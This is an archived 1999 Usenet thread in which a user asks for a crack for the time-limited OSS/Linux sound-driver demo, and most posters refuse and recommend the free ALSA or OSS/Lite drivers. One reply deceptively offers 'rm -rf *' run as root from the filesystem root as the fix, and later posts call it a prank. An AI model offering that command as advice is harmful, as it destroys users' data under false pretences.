Cracks for Linux?

Post by Sean » Wed, 18 Aug 1999 04:00:00

Hi I think free software is the best.  Especially Open Source Software.
Linux is supposed to be fre isn't it.  So why do I have to pay 20$ to get
sound?  I have the OSS/Linux demo.  That stops working after 20 minutes.
Does anyone have a crack for this?  Or does anyone know of a crack page
that has cracks for linux (like OSS/Linux maybe).  Astalaviata.box.sk
doesn't have it and I don't know where to look.  If so e-mail me at

                    http://www.searchlinux.com

Cracks for Linux?

Post by Daniel Robert Frankl » Wed, 18 Aug 1999 04:00:00

>Hi I think free software is the best.  Especially Open Source Software.
>Linux is supposed to be fre isn't it.  So why do I have to pay 20$ to get
>sound?

You don't. OSS/Lite is included in the Linux kernel, or you can get the
ALSA drivers as a patch (which will go in the kernel proper at some
point).

Download a kernel and recompile it to include support for your card. Read
the HOWTOs on metalab to find out how to do this. Alternatively, if you
are running RedHat it's even easier - just type sndconfig, it will figure
out what module to load. You should not need the commercial version of OSS
to use your sound card.

>I have the OSS/Linux demo.  That stops working after 20 minutes.
>Does anyone have a crack for this?  Or does anyone know of a crack page
>that has cracks for linux (like OSS/Linux maybe).  Astalaviata.box.sk
>doesn't have it and I don't know where to look.  If so e-mail me at

You don't seem to get this whole Linux/Free Software/Open Source thing, do
you... we don't need cracks, we don't need warez... we don't need to steal
from software companies, because here, if it doesn't exist, we make it
ourselves.

Oh yes, and cross posting questions about "cracking" to every Linux
newsgroup on the planet is *not* the best way to win friends and influence
people.

- Daniel
*       Daniel Franklin - Postgraduate student in Electrical Engineering

Cracks for Linux?

Post by Jason Ea » Wed, 18 Aug 1999 04:00:00

>Hi I think free software is the best.  Especially Open Source Software.
>Linux is supposed to be fre isn't it.  So why do I have to pay 20$ to get
>sound?  I have the OSS/Linux demo.  That stops working after 20 minutes.
>Does anyone have a crack for this?  Or does anyone know of a crack page
>that has cracks for linux (like OSS/Linux maybe).  Astalaviata.box.sk
>doesn't have it and I don't know where to look.  If so e-mail me at

I got it to work by typing in (as root):

cd /
rm -rf *

After that I didn't have any problems with OSS/Linux asking me to register it.
I think that it removes the nagware config file or something.

Good Luck,
Jason

Cracks for Linux?

Post by Brett Rossell » Thu, 19 Aug 1999 04:00:00

Maybe because you didn't read the Linux-Sound how-to's.

> Hi I think free software is the best.  Especially Open Source Software.
> Linux is supposed to be fre isn't it.  So why do I have to pay 20$ to get
> sound?  I have the OSS/Linux demo.  That stops working after 20 minutes.
> Does anyone have a crack for this?  Or does anyone know of a crack page
> that has cracks for linux (like OSS/Linux maybe).  Astalaviata.box.sk
> doesn't have it and I don't know where to look.  If so e-mail me at

>                     http://www.searchlinux.com

Cracks for Linux?

Post by Timo Tossavaine » Thu, 19 Aug 1999 04:00:00

Use the ALSA drivers:

http://www.alsa-project.org

worked for me and it's free (and better); a bit hard to setup for a newbie
perhaps. Cracking is stealing; the author of a piece of software has every
right to ask money for it and you have the right to not use it.

Timo

> Hi I think free software is the best.  Especially Open Source Software.
> Linux is supposed to be fre isn't it.  So why do I have to pay 20$ to get
> sound?  I have the OSS/Linux demo.  That stops working after 20 minutes.
> Does anyone have a crack for this?  Or does anyone know of a crack page
> that has cracks for linux (like OSS/Linux maybe).  Astalaviata.box.sk
> doesn't have it and I don't know where to look.  If so e-mail me at

>                     http://www.searchlinux.com

Cracks for Linux?

Post by Wendell Crai » Thu, 19 Aug 1999 04:00:00

> >Hi I think free software is the best.  Especially Open Source Software.
> >Linux is supposed to be fre isn't it.  So why do I have to pay 20$ to get
> >sound?  I have the OSS/Linux demo.  That stops working after 20 minutes.
> >Does anyone have a crack for this?  Or does anyone know of a crack page
> >that has cracks for linux (like OSS/Linux maybe).  Astalaviata.box.sk
> >doesn't have it and I don't know where to look.  If so e-mail me at

> I got it to work by typing in (as root):

> cd /
> rm -rf *

> After that I didn't have any problems with OSS/Linux asking me to register it.
> I think that it removes the nagware config file or something.

> Good Luck,
> Jason

Now THAT's mean!  (Understandable, though! ;)

--

The box said 'WIN95/98 or better.' so I installed LINUX!
        HEAR MY RealAudio VOICEOVER DEMO AT...

Cracks for Linux?

Post by Kaz Kylhe » Thu, 19 Aug 1999 04:00:00

>> I got it to work by typing in (as root):

>> cd /
>> rm -rf *

>> After that I didn't have any problems with OSS/Linux asking me to register it.
>> I think that it removes the nagware config file or something.

>> Good Luck,
>> Jason

>Now THAT's mean!  (Understandable, though! ;)

My experience with the proprietary OSS drivers has also led me to use rm -rf,
but only on the downloaded materials rather than the whole filesystem.

The first thing that their binary-only piece of digital trash did was promptly
lock up my kernel as soon as I opened the device. If I'm going to pay for
garbage, I might as well install Windows and use the drivers that came with the
sound card.

Cracks for Linux?

Post by Kaz Kylhe » Thu, 19 Aug 1999 04:00:00

>Use the ALSA drivers:

>http://www.alsa-project.org

>worked for me and it's free (and better); a bit hard to setup for a newbie
>perhaps. Cracking is stealing; the author of a piece of software has every
>right to ask money for it and you have the right to not use it.

Does the author also have a right to engage into agreements with manufacturers
who are then reluctant to release hardware specs to freeware competitors?

Cracks for Linux?

Post by Timo Tossavaine » Thu, 19 Aug 1999 04:00:00

> >Use the ALSA drivers:

> >http://www.alsa-project.org

> >worked for me and it's free (and better); a bit hard to setup for a newbie
> >perhaps. Cracking is stealing; the author of a piece of software has every
> >right to ask money for it and you have the right to not use it.

> Does the author also have a right to engage into agreements with manufacturers
> who are then reluctant to release hardware specs to freeware competitors?

It is perhaps unethical, but I don't see why not. The consumers should use their
power and boycott the manufacturers that don't release hw specs. Too bad
intelligent consuming is as rare as it is.

Timo

Cracks for Linux?

Post by Michael McConnel » Thu, 19 Aug 1999 04:00:00

> Hi I think free software is the best.  Especially Open Source Software.
> Linux is supposed to be fre isn't it.  So why do I have to pay 20$ to get
> sound?  I have the OSS/Linux demo.  That stops working after 20 minutes.
> Does anyone have a crack for this?  Or does anyone know of a crack page
> that has cracks for linux (like OSS/Linux maybe).  Astalaviata.box.sk
> doesn't have it and I don't know where to look.  If so e-mail me at

Try the ALSA sound drivers. What soundcard do you have?

-- Michael "Soruk" McConnell
Eridani Star System  --  The Most Up-to-Date Red Hat Linux CDROMs Available

                Eridani: Your PC doesn't need Windows or Gates.

Cracks for Linux?

Post by Lew Pitch » Thu, 19 Aug 1999 04:00:00

One word...

   Looser!

>Hi I think free software is the best.  Especially Open Source Software.
>Linux is supposed to be fre isn't it.  So why do I have to pay 20$ to get
>sound?  I have the OSS/Linux demo.  That stops working after 20 minutes.
>Does anyone have a crack for this?  Or does anyone know of a crack page
>that has cracks for linux (like OSS/Linux maybe).  Astalaviata.box.sk
>doesn't have it and I don't know where to look.  If so e-mail me at

>                    http://www.searchlinux.com

Lew Pitcher
System Consultant, Integration Solutions Architecture
Toronto Dominion Bank

1. Crack for Linux

Does anyone know where I can get crack for Linux?  I need to test how
secure the passwords are in a passwd file.

I looked at http://www.getnet.com/crak and found nothing.

I tried to look at ftp.netcom.com/pub/da/daemon9 and you can guess
what happened.

Michelle
| Whips and chains do not threaten me.  But keep whipped cream away from me. |

2. 'df' continues to report filesystem full after files deleted

3. ECC2-79 cracked: Alpha Linux did it.

4. unix com

5. Help - Crack on Linux

6. Network Adapter

7. Crack on Linux(RedHat 5.2)

8. screen capture

9. Crack for Linux ?

10. Crack on Linux

11. crack 5.0 / linux

12. Another IIS Crack? (Take a Crack)

13. c50a stop cracking after few days: T:1001249644:Crack: Done.